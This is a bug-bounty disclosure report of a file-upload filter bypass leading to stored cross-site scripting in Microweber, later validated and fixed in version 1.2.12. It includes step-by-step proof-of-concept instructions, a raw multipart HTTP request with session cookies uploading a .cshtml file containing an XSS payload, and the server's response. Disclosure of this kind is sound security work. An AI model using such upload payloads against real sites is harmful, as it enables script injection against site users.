File upload filter bypass leading to stored XSS in microweber/microweber

Valid

Reported on

Mar 9th 2022


Description

A User Can uplaod .cshtml file with XSS payload.

Proof of Concept

Login to the demo portal with admin creds at https://demo.microweber.org/demo/admin/

Navigate to page create functionality at https://demo.microweber.org/demo/admin/page/create

Select the picture upload request in burp and modify the filetype request as below (.cshtml filetype in name & xss payload in body)

Sample post request

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; mw-back-to-live-edit=true; show-sidebar-layouts=1; _ga=GA1.2.1990870926.1646662573; twk_uuid_599594841b1bed47ceb0520f={"uuid":"1.4gkrYx1pzbRZRQsvreYdgHaygG5EJY38fHOKxQz8FFKqX7uVHEiHATiTi6PECYDSbfVRQpTMHYk0YbGWZIKevu3luS32NQqhPAhdmzQ5EM9f6aPpZpmc8W8L174F1NvcgS2BLVxa8rgdUYdRPot","version":3,"domain":"microweber.org","ts":1646662604068}; laravel_session=Cgwk6v6SW3Pe44qMKD4mzhxN5Hkl7qPviYDYyL9k; csrf-token-data=%7B%22value%22%3A%22KLxn5nyDA3qx7MB7mvgGDPMDiip4h8GeY3wI9nza%22%2C%22expiry%22%3A1646839612227%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/page/create
Content-Length: 577
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjHgSED0Yg78agVSE
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="name"

a.cshtml
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<div onmouseover="alert(document.domain)" style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></div>

------WebKitFormBoundaryjHgSED0Yg78agVSE--

Response

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 18:14:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 18:14:17 GMT
Connection: close
Content-Type: application/json
Content-Length: 129

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/a_11.cshtml","name":"a_11.cshtml","bytes_uploaded":"577"}

[my link](file:///C:/Users/rajesh/Desktop/1.JPG)

Impact

Stored XSS through file upload feature

References

We are processing your report and will contact the microweber team within 24 hours. a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Bozhidar Slaveykov validated this vulnerability a year ago
rajeshpatil013 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bozhidar Slaveykov marked this as fixed in 1.2.12 with commit 89200c a year ago
Bozhidar Slaveykov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation